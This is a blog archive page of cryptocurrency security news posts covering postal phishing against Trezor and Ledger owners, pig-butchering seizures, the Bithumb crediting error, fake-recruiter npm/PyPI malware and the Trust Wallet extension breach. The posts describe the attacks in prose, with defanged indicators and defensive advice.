Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label cryptocurrency. Show all posts
Technology
Blockchain cryptocurrency Cryptography Technology

Coinbase CEO Says Quantum Threat to Crypto Is Manageable

 

Coinbase Chief Executive Brian Armstrong said concerns that quantum computing could undermine blockchain security are manageable, describing the issue as one the crypto industry has time to address. 

Speaking to CNBC at the World Liberty Forum in Mar a Lago alongside Senator Bernie Moreno of Ohio, Armstrong responded to questions about whether advances in quantum technology could eventually break blockchain encryption. 

“One thing I’ve heard is that quantum is going to break the blockchain. Is that true?” interviewer Sara Eisen asked. 

Armstrong dismissed the idea that the threat is imminent or unfixable. 

He said Coinbase has been proactive and is working closely with major blockchain networks to prepare for a shift toward post quantum cryptography. 

“We’re going to stay engaged on that, and I think it’s very solvable,” Armstrong said. 

Quantum computing has long been viewed as a theoretical risk to public key cryptography, which underpins networks such as Bitcoin and Ethereum. 

While current quantum systems are not powerful enough to crack widely used encryption methods, researchers warn that upgrading global financial systems and decentralized networks could take years, making early preparation important. 

Last month, Coinbase formed an independent quantum advisory board to guide its efforts. The group includes University of Texas professor Scott Aaronson, Stanford cryptographer Dan Boneh, Ethereum Foundation researcher Justin Drake and Coinbase Head of Cryptography Yehuda Lindell. 

The advisory board is expected to publish research evaluating quantum related risks and recommend migration strategies for blockchain systems. Industry observers say there is still time to transition to stronger cryptographic standards. 

Pranav Agarwal, independent director at Jetking Infotrain India, said the main concern for Bitcoin would be the potential breaking of private keys secured by SHA 256 encryption. 

However, he noted that the timeline for building a large scale quantum system capable of such an attack remains uncertain and that upgrading encryption is feasible. 

“There is enough time” to strengthen cryptographic protections across major networks, including Bitcoin and Ethereum, Agarwal said. 

Across the broader crypto ecosystem, preparation has accelerated. The Ethereum Foundation recently elevated post quantum security to a strategic priority. 

Ethereum co founder Vitalik Buterin has urged developers not to delay adopting quantum resistant cryptography, arguing that networks should aim for long term resilience rather than emergency fixes. 

The Solana Foundation said in December that it had begun testing quantum resistant digital signatures on a test network. Bitcoin developers have also advanced proposals such as BIP 360, designed to reduce exposure to quantum related risks. 

During the CNBC interview, Armstrong also addressed developments in U.S. market structure legislation. 

He defended Coinbase’s decision to oppose an earlier draft of a bill known as the CLARITY Act, citing concerns over how stablecoin rewards were treated in the proposal. Armstrong rejected claims that Coinbase blocked the legislation. 

He said the company raised issues that brought lawmakers back to the table and expressed confidence that a revised compromise could advance in the coming months, potentially reaching the President’s desk. 

He also voiced support for the Commodity Futures Trading Commission’s authority over event contracts and prediction markets, as policymakers continue to debate the regulatory framework for digital assets in the United States.
Read more »
Ledger
Crypto Wallet Crypto Wallet Theft cryptocurrency Cryptocurrency threats Cyber Phishing Cyber Security Ledger

Trezor and Ledger Impersonated in Physical QR Code Phishing Scam Targeting Crypto Wallet Users

 

Nowadays criminals push fake crypto warnings through paper mail, copying real product packaging from firms like Trezor and Ledger. These printed notes arrive at homes without digital traces, making them feel more trustworthy than email scams. Instead of online messages, fraudsters now use stamps and envelopes to mimic official communication. Because it comes in an envelope, people may believe the request is genuine. Through these letters, attackers aim to steal secret backup codes used to restore wallets. Physical delivery gives the illusion of authenticity, even though the goal remains theft. The method shifts away from screens but keeps the same deceitful intent. 

Pretending to come from company security units, these fake messages tell recipients they need to finish an urgent "Verification Step" or risk being locked out of their wallets. A countdown appears on screen, pushing people to act fast - slowing down feels risky when time runs short. Opening the link means scanning a barcode first, then moving through steps laid out by the site. Pressure builds because delays supposedly lead to immediate consequences. Following directions seems logical under such conditions, especially if trust in the sender feels justified. 

A single message pretending to come from Trezor told users about an upcoming Authentication Check required before February 15, 2026, otherwise access to Trezor Suite could be interrupted. In much the same way, another forged notice aimed at Ledger customers claimed a Transaction Check would turn mandatory, with reduced features expected after October 15, 2025, unless acted upon. Each of these deceptive messages leads people to fake sites designed to look nearly identical to real setup portals. BleepingComputer’s coverage shows the QR codes redirect to websites mimicking real company systems. 

Instead of clear guidance, these fake sites display alerts - claiming accounts may be limited, transactions could fail, or upgrades might stall without immediate action. One warning follows another, each more urgent than the last, pulling users deeper into the trap. Gradually, they reach a point where entering their crypto wallet recovery words seems like the only option left. Fake websites prompt people to type in their 12-, 20-, or 24-word recovery codes, claiming it's needed to confirm device control and turn on protection. 

Though entered privately, those words get sent straight to servers run by criminals. Because these attackers now hold the key, they rebuild the digital wallet elsewhere without delay. Money vanishes quickly after replication occurs. Fewer scammers send fake crypto offers by post, even though email tricks happen daily. Still, real-world fraud attempts using paper mail have appeared before. 

At times, crooks shipped altered hardware wallets meant to steal recovery words at first use. This latest effort shows hackers still test physical channels, especially if past leaks handed them home addresses. Even after past leaks at both Trezor and Ledger revealed user emails, there's no proof those events triggered this specific attack. However the hackers found their targets, one truth holds - your recovery phrase stays private, always. 

Though prior lapses raised alarms, they didn’t require sharing keys; just like now, safety lives in secrecy. Because access begins where trust ends, never hand over seed words. Even when pressure builds, silence protects better than any tool. Imagine a single line of words holding total power over digital money - this is what a recovery phrase does. Ownership shifts completely when someone else learns your seed phrase; control follows instantly. Companies making secure crypto devices do not ask customers to type these codes online or send them through messages. 

Scanning it, emailing it, even mailing it physically - none of this ever happens if the provider is real. Trust vanishes fast when any official brand demands such sharing. Never type a recovery phrase anywhere except the hardware wallet during setup. When messages arrive with urgent requests, skip the QR scans entirely. Official sites hold the real answers - check there first. A single mistake could expose everything. Trust only what you confirm yourself.  

A shift in cyber threats emerges as fake letters appear alongside rising crypto use. Not just online messages now - paper mail becomes a tool for stealing digital assets. The method adapts, reaching inboxes on paper before screens. Physical envelopes carry hidden risks once limited to spam folders. Fraud finds new paths when trust in printed words remains high.
Read more »
U.S. Department of Justice
cryptocurrency Cyber Fraud DoJ crypto seizure pig butchering scam Tether freeze U.S. Department of Justice

U.S. Justice Department Seizes $61 Million in Tether Linked to ‘Pig Butchering’ Crypto Scams


The U.S. Department of Justice (DoJ) has revealed that it seized approximately $61 million in Tether connected to fraudulent cryptocurrency operations commonly referred to as “pig butchering” scams.

According to the department, investigators traced the confiscated digital assets to wallet addresses allegedly used to launder funds obtained through cryptocurrency investment fraud schemes. The stolen proceeds were reportedly siphoned from victims who were manipulated into investing in fake platforms promising lucrative returns.

"Criminal actors and professional money launderers use cyber-enabled fraud schemes to swindle their victims and conceal their ill-gotten gains," said HSI Charlotte Acting Special Agent in Charge Kyle D. Burns.

"HSI special agents work diligently to trace the illicit proceeds of crime across the globe to disrupt and dismantle the transnational criminal organizations that seek to defraud hardworking Americans."

Authorities explained that these schemes typically begin with scammers initiating contact through dating platforms or social media messaging applications. The perpetrators build trust by posing as romantic interests or financial advisors before persuading victims to invest in fabricated cryptocurrency opportunities.

Officials further noted that many of these operations are allegedly run from scam compounds based primarily in Southeast Asia. Individuals trafficked under false promises of well-paying jobs are reportedly forced to participate in the schemes. Their passports are confiscated, and they are coerced into deceiving targets online under threats of severe punishment.

Victims are directed to professional-looking but fraudulent investment websites that display falsified portfolios and exaggerated profits. These manipulated dashboards are designed to encourage larger investments. When victims attempt to withdraw their funds, they are often told to pay additional “fees,” resulting in further financial losses.

"Once the victims' money transferred to a cryptocurrency wallet under the scammers’ control, the crooks quickly routed that money through many other wallets to hide the nature, source, control, and ownership of that stolen money," the department added.

In a related statement, Tether disclosed that it has frozen roughly $4.2 billion in assets tied to unlawful activities so far. The company said that nearly $250 million of that amount has been linked to scam networks since June 2025.

The seizure marks one of the larger enforcement actions targeting cryptocurrency-enabled fraud and reflects ongoing efforts by U.S. authorities to disrupt global cybercrime syndicates exploiting digital assets.
Read more »
Korea
Bitcoin Bitcoin Cyber Threat Bithumb cryptocurrency Cryptocurrency news Cyber Security digital currency Financial Regulators Korea

Bithumb Error Sends 620,000 Bitcoins to Users, Triggers Regulatory Scrutiny in South Korea

 

A huge glitch at Bithumb, South Korea’s second-biggest digital currency platform, triggered chaos when users suddenly found themselves holding vast quantities of bitcoin due to a flawed promotion. Instead of issuing minor monetary rewards, a technical oversight allowed 620,000 bitcoins to be wrongly allocated. Regulators quickly stepped in, launching investigations as the scale of the incident became clear. Recovery efforts are now underway for assets exceeding $40 billion, stemming directly from the mishap. Legal pressure mounts on the firm while authorities assess compliance failures. What began as a routine marketing effort has turned into one of the largest operational blunders in crypto trading history.  

On 6 February, a mistake unfolded amid a promotion meant to give rewards to 695 qualifying users - totaling 620,000 Korean won, about $423. Instead of using local currency, one employee typed in bitcoin by accident; this shifted the reward value dramatically. What should have been small bonuses became 620,000 bitcoins, valued around $42 billion then. Among those who qualified, nearly half accessed their digital boxes before anyone noticed. These 249 people ended up with massive deposits, exceeding the entire crypto balance held by the platform. 

Bithumb said it fixed many incorrect deposits through adjustments in its internal records. Still, regulators noted approximately 13 billion won - about $9 million - was unaccounted for, lost when certain users moved or cashed out funds prior to detection. During the half-hour span before freezing actions began, 86 individuals allegedly offloaded close to 1,788 bitcoins, sparking temporary shifts in pricing across the site's trading system. 

Criticism came fast once news broke. "Catastrophic" was the word used by Lee Chan-jin - head of South Korea’s Financial Supervisory Service - to describe what happened to those who offloaded their bitcoin. With prices climbing afterward, people forced to give back holdings might now owe money instead. Not just a one-off error, according to Lee; it revealed deeper flaws in how crypto platforms handle internal ledgers and transaction safeguards. 

Disagreement persists among legal professionals regarding possible criminal consequences for users who withdrew accidentally deposited bitcoin. Though crypto assets were central to a 2021 South Korean high court decision, their exclusion from the definition of "property" in penal statutes muddies enforcement paths. Instead of pursuing drawn-out lawsuits, Bithumb initiated private talks with around eighty individuals who converted the digital value into local currency, asking repayment in won amounts. 

Now probing deeper, the Financial Supervisory Service has opened a comprehensive review; meanwhile, lawmakers in Seoul will hold an urgent session on 11 February to press officials and platform leaders for answers. Speaking publicly, Bithumb admitted changes are underway - its payout systems being rebuilt, oversight tightened - even though they insist no cyberattack occurred nor did outside actors gain access.
Read more »
South Korea
Bitcoin Bithumb cryptocurrency Cyber Security phishing South Korea

Bithumb Mistakenly Credits Users With Billions in Bitcoin During Promotion Error

 




A promotional campaign at South Korean cryptocurrency exchange Bithumb turned into a large scale operational incident after a data entry mistake resulted in users receiving bitcoin instead of a small cash-equivalent reward.

Initial reports suggested that certain customers were meant to receive 2,000 Korean won as part of a routine promotional payout. Instead, those accounts were credited with 2,000 bitcoin each. At current market valuations, 2,000 bitcoin represents roughly $140 million per account, transforming what should have been a minor incentive into an extraordinary allocation.

Bithumb later confirmed that the scope of the error was larger than early estimates. According to the exchange, a total of 620,000 bitcoin was mistakenly credited to 695 user accounts. Based on prevailing prices at the time of the incident, that amount corresponded to approximately $43 billion in value. The exchange stated that the issue stemmed from an internal processing mistake and was not connected to external hacking activity or a breach of its security infrastructure. It emphasized that customer asset custody systems were not compromised.

The sudden appearance of large bitcoin balances had an immediate effect on trading activity within the platform. Bithumb reported that the incident contributed to a temporary decline of about 10 percent in bitcoin’s price on its exchange, as some affected users rapidly sold the credited assets. To contain further disruption, the company restricted withdrawals and suspended certain transactions linked to the impacted accounts. It stated that 99.7 percent of the mistakenly issued bitcoin has since been recovered.

The event has revived discussion around the concept often described as “paper bitcoin.” On centralized exchanges, user balances are reflected in internal ledgers rather than always corresponding to coins held in individual blockchain wallets. In practice, exchanges may not maintain a one-to-one on-chain reserve for every displayed balance at every moment. This structural model has previously drawn criticism, most notably during the collapse of Mt. Gox in 2014, which was then the largest bitcoin exchange globally. Its failure exposed major discrepancies between reported and actual holdings.

Data from blockchain analytics firm Arkham Intelligence indicates that Bithumb currently controls digital assets worth approximately $5.3 billion. That figure is substantially lower than the $43 billion temporarily reflected in the erroneous credits, underscoring that the allocation existed within internal accounting records rather than as newly transferred blockchain assets.

Observers on social media platform X questioned how such a large discrepancy could occur without automated safeguards preventing the issuance. Bithumb has faced security challenges in the past. In 2017, an employee’s device was compromised, exposing customer data later used in phishing attempts. In 2018, around $30 million in cryptocurrency was stolen in an attack attributed to the Lazarus Group, an organization widely linked to North Korea. A further breach in 2019 resulted in losses of roughly $20 million and was initially suspected to involve insider participation. In each instance, Bithumb stated that it compensated affected users for lost funds, though earlier incidents included exposure of personal information.

Beyond cybersecurity events, the exchange has also been subject to regulatory scrutiny, including investigations related to alleged fraud, embezzlement, and promotional practices. Reports indicate it was again raided this week over concerns involving misleading advertising.

Bithumb maintains that no customer ultimately suffered a net financial loss from the recent error, though the price movement raised concerns about potential liquidations for leveraged traders. A comparable situation occurred at decentralized exchange Paradex, which reversed trades following a pricing malfunction.

The incident unfolds amid broader market strain, with digital asset prices astronomically below their October peaks and political debate intensifying around cryptocurrency-linked business interests connected to U.S. public figures. Recent disclosures from the U.S. Department of Justice concerning Jeffrey Epstein’s early involvement in cryptocurrency ventures have further fueled online speculation and conspiracy narratives across social platforms.

Read more »
online trading
Bitcoins Cryptocurrency Threats Crypto Market Crypto Risk Crypto Safety cryptocurrency Cyber Security online trading

Cryptocurrency Market Slump Deepens Amid Global Tech Selloff and Risk-Off Sentiment

 

Now falling, the crypto market feels strain from turmoil spreading beyond tech stocks worldwide. As investors pull back sharply, digital currencies take a hit alongside firms that list Bitcoin on their books. When one part shakes, others follow - worry grows over how deeply losses might spread through finance and tech alike. 

A sharp drop hit Bitcoin lately, pushing prices toward their weakest point since early 2023. Nearly $12 down for every hundred just yesterday, it now trades near sixty thousand dollars, according to figures on CoinMarketCap. Once hovering near seventy-two thousand, the descent has been relentless. Four months back, it stood at about one hundred twenty-six thousand - today, less than half remains. 

This plunge highlights how deeply the current market retreat is cutting. What stands clear is how ongoing sell-offs, paired with steady withdrawals from spot Bitcoin ETFs, weigh heavily on price direction. Around $60,000, any upward movement in Bitcoin has stalled - this pattern, according to Pi42's co-founder and chief executive, Avinash Shekhar, shapes a guarded mindset among investors. Each time gains slip away, trust in short-term rebound weakens. With swings growing sharper, hesitation lingers in trader behavior. 

Even after a steep drop, Bitcoin showed signs of steadiness around $65,000 by Friday morning in Indian markets. Still, the overall market value fell almost 9 per cent, landing near $1.3 trillion. Trade spiked dramatically - volume climbed above 90 per cent - as approximately $143 billion in Bitcoin shifted in just one day. Around half of all cryptocurrency investors kept leaning toward major coins under pressure, with Bitcoin holding nearly 58 per cent share. Stability returned slowly while trading intensity stayed high. Despite stronger signals elsewhere, wider economic pressures continue to cloud investor mood. 

According to Giottus chief executive Vikram Subburaj, conditions now reflect a typical pullback environment - liquidity shrinks while buyers hesitate and global concerns linger without resolution. When examined closely, shrinking exchange-traded fund flows along with strained blockchain metrics have together dampened appetite for crypto holdings, deepening the drop seen over recent seven-day periods. This drop marks the toughest stretch for digital currencies since last October, just ahead of Donald Trump securing the presidency amid pro-crypto signals throughout his run. 

Not only Bitcoin feels the heat - Ethereum, BNB, Solana, XRP, Dogecoin, Cardano, and Bitcoin Cash all slid 9 to 13 percent in tandem. Sector-wide losses suggest a widespread pullback, not an isolated dip. Despite earlier momentum, confidence now appears fragile across major assets. Besides the plunge, crypto's overall market value now sits near $2.22 trillion. That fall means losses exceeding $2 trillion since the high mark of about $4.39 trillion seen in October 2025, nearly half vanishing within only four weeks. Rather than stabilizing, investor mood has soured due to swings in metals like gold and silver - normally seen as secure - alongside slumping stock markets. 

Because of these shifts, appetite for risk-heavy assets has cooled noticeably. Despite weaker US job figures and rising worries over big spending in AI, the cryptocurrency space stays under pressure, says Akshat Siddhant of Mudrex. Because global markets show caution, downward trends hold firm for now. Yet, within this pullback, patient Bitcoin holders might find pockets of value worth watching closely. Though short-term volatility lingers, the broader downturn isn’t seen as a total barrier to strategic entry points. Following such dips carefully could matter more than reacting fast.
Read more »
snail mail
cryptocurrency Cyber Fraud forged letterheads Hardware Wallets Ledger phishing snail mail

Fraudsters Use Postal Mail to Target Crypto Hardware Wallet Owners



Cybercriminals are using traditional mail services to target cryptocurrency users who own hardware wallets manufactured by Trezor and Ledger. The attackers are distributing printed letters that falsely present themselves as official security notifications and attempt to trick recipients into revealing their wallet recovery phrases.

The letters instruct users to complete a compulsory “Authentication Check” or “Transaction Check,” claiming this step will soon become mandatory. Recipients are warned that failure to comply before stated deadlines could result in disrupted wallet functionality. One Trezor-themed letter sets February 15, 2026 as the cutoff date, while a Ledger-branded version references October 15, 2025.

The correspondence appears professionally formatted and claims to originate from internal security or compliance departments. In a case shared publicly by cybersecurity researcher Dmitry Smilyanets, a Trezor-related letter stated that authentication would soon be enforced across devices and urged users to scan a QR code to prevent interruption of Trezor Suite access. The letter further asserted that even if users had already enabled authentication on their device, they must repeat the process to ensure full activation and synchronization of the feature.

The QR codes direct recipients to fraudulent domains including trezor.authentication-check[.]io and ledger.setuptransactioncheck[.]com. At the time of reporting, the Ledger-linked domain was inactive, while the Trezor-related site remained accessible but displayed a phishing warning from Cloudflare.

The Trezor-themed phishing page states that users must complete authentication by February 15, 2026 unless they purchased specific models, including Trezor Safe 7, Safe 5, Safe 3, or Safe 1, after November 30, 2025, in which case the feature is allegedly preconfigured. After selecting “Get Started,” users are warned that ignoring the process could lead to blocked access, transaction signing errors, and complications with future updates.

Those who continue are prompted to enter their wallet recovery phrase. The form accepts 12-, 20-, or 24-word phrases and claims the information is necessary to confirm device ownership. Technical analysis shows that submitted phrases are transmitted through a backend endpoint located at /black/api/send.php on the phishing domain.

With access to the recovery phrase, attackers can restore the wallet on another device and transfer funds.

The method used to identify recipients remains unclear. However, both manufacturers have experienced past data breaches that exposed customer contact information, potentially increasing targeting risks.

Although email-based crypto phishing is common, physical mail scams remain relatively uncommon. In 2021, attackers mailed tampered Ledger devices designed to capture recovery phrases during setup. A similar postal campaign targeting Ledger users was reported again in April.

A recovery phrase, also called a seed phrase, represents the private cryptographic key controlling a cryptocurrency wallet. Anyone who obtains it gains complete control over the associated funds.

Legitimate hardware wallet providers do not request recovery phrases through mail, QR codes, websites, or email. The phrase should only be entered directly on the hardware device during a genuine restoration process.



Read more »
software supply chain attacks
cryptocurrency Fake Recruiter Scam Lazarus Group malware NPM malware Open Source Security PyPI Security Threats Remote Access Trojan software supply chain attacks

Fraudulent Recruiters Target Developers with Malicious Coding Tests


 

If a software developer is accustomed to receiving unsolicited messages offering lucrative remote employment opportunities, the initial approach may appear routine—a brief introduction, a well-written job description, and an invitation to complete a small technical exercise. Nevertheless, behind the recent waves of such outreach lies a sophisticated operation. 

During the investigation, investigators have discovered a new version of the long-running fake recruiter campaign linked to North Korean threat actors. This campaign now targets JavaScript and Python developers with cryptocurrency-themed assignments. 

With a deliberate, modular design that makes it possible for operators to rapidly rebuild and re-deploy infrastructure when parts of the campaign are exposed or dismantled since at least May 2025. Several malicious packages were quietly published to the NPM and PyPI ecosystems, which developers utilize in routine work processes. 

Once executed within a developer's environment, the packages serve as downloaders that discreetly retrieve a remote access trojan. Researchers have compiled 192 packages associated with the campaign, which they have labeled Graphalgo, confirming the threat's scale and persistence. 

It has been determined that the operation is more than just opportunistic phishing and represents a carefully orchestrated social engineering campaign incorporated into legitimate hiring processes rather than just opportunistic phishing. 

A recruiting impersonator impersonates a recruiter from an established technology company, initiating communication through professional networking platforms and via email with job descriptions, technical prerequisites, and compensation information aligned with market trends. By cultivating trust over a number of exchanges, the operators resemble the cadence and tone of authentic recruitment cycles without relying on urgency or alarm. 

Following the establishment of legitimacy, they implement a coding assessment, typically a compressed archive, designed to provide a standard measure of the candidate's ability to solve problems or develop blockchain-related applications. 

In addition, the files provided contain embedded malware that is designed to execute once the developer tries to review or run the project locally. Using routine practices such as cloning repositories, installing dependencies, and executing test scripts, the attackers were able to circumvent conventional suspicion triggers associated with unsolicited attachments. 

The strategy demonstrates a deep understanding of developer behavior, technical interview conventions, and the implicit trust derived from structured hiring processes, according to researchers. The execution of the malicious project components in several observed cases enabled unauthorized system access, resulting in credential harvesting, lateral movement, as well as the possibility of exposing proprietary source code and corporate infrastructure to unauthorized access. 

A key component of the campaign's success is not exploiting software vulnerabilities, but rather manipulating professional norms—transforming recruitment itself into a delivery channel for compromise. Several ReversingLabs researchers have determined that the infrastructure supporting the campaign is intended to mirror legitimate activity within the blockchain and crypto-trading industries. 

Threat actors establish fictitious companies, post detailed job postings on professional and social platforms, such as LinkedIn, Facebook, and Reddit, and request candidates to complete technical assignments as part of the simulated interview process. The tasks are usually similar to routine coding evaluations, where candidates clone repositories, execute projects locally, resolve minor bugs, and submit improvements. 

Nevertheless, the critical objective is not the solution submitted, but the process of executing it. When running a project, a malicious dependency sourced from trusted ecosystems such as npm and PyPI is installed, thus allowing the payload to be introduced indirectly through dependency resolution processes. 

As investigators point out, the process of assembling such repositories is straightforward: a legitimate open-source template is modified to reference a compromised or weaponized package, following which the project appears technically sound and professionally structured. An example of a benign package called “bigmathutils,” which had accumulated approximately 10,000 downloads, was introduced into malicious functionality by version 1.1.0. 

A maneuver likely intended to limit forensic visibility followed by the deprecation and removal of the package soon thereafter. A more extensive campaign was later developed, dubbed Graphalgo for its frequent use of packages containing the term "graph" and their imitations of well-established libraries such as graphlib.

Researchers have observed a shift in package names that include the word "big" since December 2025, although there has not been a comprehensive identification of the recruitment infrastructure associated with that phase. As a means of giving structural legitimacy to their operations, actors utilize GitHub Organizations. The visible project files of GitHub repositories do not contain any overtly malicious code.

Instead, compromise occurs by resolving external dependencies -Graphalgo packages retrieved from npm or PyPI - thus separating the malicious logic from the repository, making detection more challenging. By executing the projects as instructed, developers inadvertently install a remote access trojan on their computer systems. Analysis of the malware indicates it is capable of enumerating processes, executing arbitrary commands via command-and-control channels, exfiltrating data and delivering secondary payloads. 

A clear financial motive associated with cryptocurrency asset theft is also evident from the fact that the RAT checks for the MetaMask browser extension. According to researchers, multiple developers were successfully compromised before the activity was discovered, demonstrating the operational effectiveness of embedding malicious logic within trusted mechanics in software development workflows.

According to a technical examination of the later infection stages, the intermediate payloads serve mainly as downloaders, retrieving the final remote access trojan from the attacker's infrastructure. Upon deployment, the RAT communicates periodically with its command-and-control server, polling it for tasking and executing the instructions given by the operator. 

The tool has a feature set that is consistent with mature post-exploitation tools: file uploading and downloading capabilities, process enumeration, and execution of arbitrary system commands. Additionally, communications with the C2 endpoint are token-protected, requiring a valid server-issued token when registering an agent or issuing a command command. 

It is believed that this additional authentication layer serves to restrict unsolicited interaction with the infrastructure and to reflect operational discipline previously observed in North Korean state-backed campaigns. In addition to detecting the MetaMask browser extension, the malware demonstrates a clear interest in crypto assets, aligning with financial motivations historically linked to Pyongyang-aligned groups as well as a clear interest in cryptocurrency assets. 

As part of their investigation, researchers identified three functionally equivalent variants of the final payload implemented in various languages. JavaScript and Python versions were distributed through malicious packages hosted on npm and PyPI, while a third variant was found independently using Visual Basic Script. 

As first noted in early February 2026, the VBS sample communicates with the same C2 infrastructure associated with earlier "graph"-named packages, as evidenced by the SHA1 hash dbb4031e9bb8f8821a5758a6c308932b88599f18. This suggests a parallel or yet to be identified recruitment frontend is part of the broader operation. North Korean activity in public open-source ecosystems has been documented in a number of cases. 

VMConnect, an operation later dubbed and attributed to the Lazarus Group, was detected by ReversingLabs in 2023 involving malicious PyPI impersonation operations. The attack involved weaponized packages linked to convincing GitHub repositories which were able to reinforce trust before delivering malware from attacker infrastructure.

In a year, researchers observed the VMConnect tradecraft continuing to be practiced, this time incorporating fabricated coding assessments associated with fraudulent job interviews. As in some instances, the actors assumed the identity of Capital One, further demonstrating their willingness to appropriate established corporate identities to legitimize outreach. Other security firms have confirmed the pattern through their reports. 

As of 2023, Phylum provided information about NPM malware campaigns that utilize token-based mechanisms and paired packages to avoid detection, while Unit 42 provided information about the methods North Korean state-sponsored actors used to distribute multi-stage malware through developer ecosystems. In addition to Veracode and Socket's disclosures during 2024 and 2025, further npm packages attributed to Lazarus-related activity were also identified, including second-stage payloads that erased forensic evidence upon execution of the package.

In the present campaign, attribution is based on a convergence of technical and operational indicators rather than a single artifact. Lazarus methodologies, such as using fake interviews to gain access, cryptocurrency-themed lures, multistage payload chains layered with obfuscation, and deliberately delaying the release of benign and malicious package versions, are similar to previously documented Lazarus methods. 

Moreover, token-protected C2 communications and Git commit timestamps aligned with GMT+9, North Korea's time zone, provide context alignment. These characteristics suggest a coordinated, state-sponsored effort rather than opportunistic cybercrime. Researchers cite the modular architecture of the campaign as a significant strength. By separating recruitment personas from backend payload infrastructure, operators can rotate the company names, job postings, and thematic branding without altering core delivery mechanisms.

Although a direct link has been established between "graph"-named packages and specific blockchain-based job offerings, the frontend elements for the newer "big"-named packages and the VBS RAT variant have not yet been identified in detail. 

ReversingLabs analyzed the Graphalgo activity and compiled an extensive set of indicators of compromise linked to the operation, including malicious package names, hashes, domains, and C2 endpoints as part of its investigation. This gap indicates that elements of the operation likely remain active and evolving. These artifacts are crucial in assisting organizations in the detection and response to incidents, since they enable them to identify exposures within development environments and within software supply chains.

Lazarus-related operations persisting across NPM and PyPI underscores a broader reality: open-source ecosystems remain strategically valuable target surfaces, while recruitment-themed social engineering has evolved into an extremely sophisticated intrusion vector that is capable of bypassing conventional defense measures. Those findings underscore the importance of reassessing the implicit trust placed in external code and recruitment-driven processes among development teams.

Besides email filtering and endpoint protection, security controls should include rigorous dependency monitoring, sandboxing of third-party projects, and stricter verification of unsolicited technical assessments in addition to traditional email filtering and endpoint protection. 

An organization should implement a software composition analysis, enforce a least-privilege development environment, and monitor anomalous outbound connections originating from the build system or developer workstations. As a result, awareness programs must be updated to address recruitment-themed social engineering, which incorporates professional credibility with technical deception in order to achieve effective recruitment results.

Threat actors are continuing to adapt their tactics to mimic legitimate industry practices, which is why defensive strategies should mature as well - treating development environments and open-source dependencies as critical security boundaries as opposed to mere conveniences.
Read more »
Online Trading Scam
cryptocurrency cryptocurrency security Cryptocurrency Users Cyber Security online trading Online Trading Scam

Suspicious Polymarket Bets Spark Insider Trading Fears After Maduro’s Capture

 

A sudden, massive bet surfaced just ahead of a major political development involving Venezuela’s leader. Days prior to Donald Trump revealing that Nicolás Maduro had been seized by U.S. authorities, an individual on Polymarket placed a highly profitable position. That trade turned a substantial gain almost instantly after the news broke. Suspicion now centers on how the timing could have been so precise. Information not yet public might have influenced the decision. The incident casts doubt on who truly knows what - and when - in digital betting arenas. Profits like these do not typically emerge without some edge. 

Hours before Trump spoke on Saturday, predictions about Maduro losing control by late January jumped fast on Polymarket. A single user, active for less than a month, made four distinct moves tied to Venezuela's political situation. That player started with $32,537 and ended with over $436,000 in returns. Instead of a name, only a digital wallet marks the profile. Who actually placed those bets has not come to light. 

That Friday afternoon, market signals began shifting - quietly at first. Come late evening, chances of Maduro being ousted edged up to 11%, starting from only 6.5% earlier. Then, overnight into January 3, something sharper unfolded. Activity picked up fast, right before news broke. Word arrived via a post: Trump claimed Maduro was under U.S. arrest. Traders appear to have moved quickly, moments prior. Their actions hint at advance awareness - or sharp guesswork - as prices reacted well before confirmation surfaced. Despite repeated attempts, Polymarket offered no prompt reply regarding the odd betting patterns. 

Still, unease is growing among regulators and lawmakers. According to Dennis Kelleher - who leads Better Markets, an independent organization focused on financial oversight - the bet carries every sign of being rooted in privileged knowledge Not just one trader walked away with gains. Others on Polymarket also pulled in sizable returns - tens of thousands - in the window before news broke. That timing hints at information spreading earlier than expected. Some clues likely slipped out ahead of formal releases. One episode sparked concern among American legislators. 

On Monday, New York's Representative Ritchie Torres - affiliated with the Democratic Party - filed a bill targeting insider activity by public officials in forecast-based trading platforms. Should such individuals hold significant details not yet disclosed, involvement in these wagers would be prohibited under his plan. This move surfaces amid broader scrutiny over how loosely governed these speculative arenas remain. Prediction markets like Polymarket and Kalshi gained traction fast across the U.S., letting people bet on politics, economies, or world events. 

When the 2024 presidential race heated up, millions flowed into these sites - adding up quickly. Insider knowledge trades face strict rules on Wall Street, yet forecasting platforms often escape similar control. Under Biden, authorities turned closer attention to these markets, increasing pressure across the sector. When Trump returned to influence, conditions shifted, opening space for lighter supervision. At Kalshi and Polymarket, leadership includes Donald Trump Jr., serving behind the scenes in guiding roles. 

Though Kalshi clearly prohibits insider trading - even among government staff using classified details - the Maduro wagering debate reveals regulatory struggles. Prediction platforms increasingly complicate distinctions, merging guesswork, uneven knowledge, then outright ethical breaches without clear boundaries.
Read more »
Trust Wallet
AI Binance cryptocurrency Data Data Breach Finance Google Trust Wallet

Trust Wallet Browser Extension Hacked, $7 Million Stolen


Users of the Binance-owned Trust wallet lost more than $7 million after the release of an updated chrome extension. Changpenng Zhao, company co-founder said that the company will cover the stolen money of all the affected users. Crypto investigator ZachXBT believes hundreds of Trust Wallet users suffered losses due to the extension flaw. 

Trust Wallets in a post on X said, “We’ve identified a security incident affecting Trust Wallet Browser Extension version 2.68 only. Users with Browser Extension 2.68 should disable and upgrade to 2.69.”

CZ has assured that the company is investigating how threat actors were able to compromise the new version. 

Affected users

Mobile-only users and browser extension versions are not impacted. User funds are SAFE,” Zhao wrote in a post on X.

The compromise happened because of a flaw in a version of the Trust Wallet Google Chrome browser extension. 

What to do if you are a victim?

If you suffered the compromise of Browser Extension v2.68, follow these steps on Trust Wallet X site:

  • To safeguard your wallet's security and prevent any problems, do not open the Trust Wallet Browser Extension v2.68 on your desktop computer. 
  • Copy this URL into the address bar of your Chrome browser to open the Chrome Extensions panel: chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph
  • If the toggle is still "On," change it to "Off" beneath the Trust Wallet. 
  • Select "Developer mode" from the menu in the top right corner. 
  • Click the "Update" button in the upper left corner. 
  • Verify the 2.69 version number. The most recent and safe version is this one. 

Please wait to open the Browser Extension until you have updated to Extension version 2.69. This helps safeguard the security of your wallet and avoids possible problems.

How did the public react?

Social media users expressed their views. One said, “The problem has been going on for several hours,” while another user complained that the company ”must explain what happened and compensate all users affected. Otherwise reputation is tarnished.” A user also asked, “How did the vulnerability in version 2.68 get past testing, and what changes are being made to prevent similar issues?”

Read more »
Telegram
cryptocurrency Cyber Crime Dark Web Scams Telegram

Telegram-Based Crypto Scam Networks Are Now Larger Than Any Dark Web Market in History

 



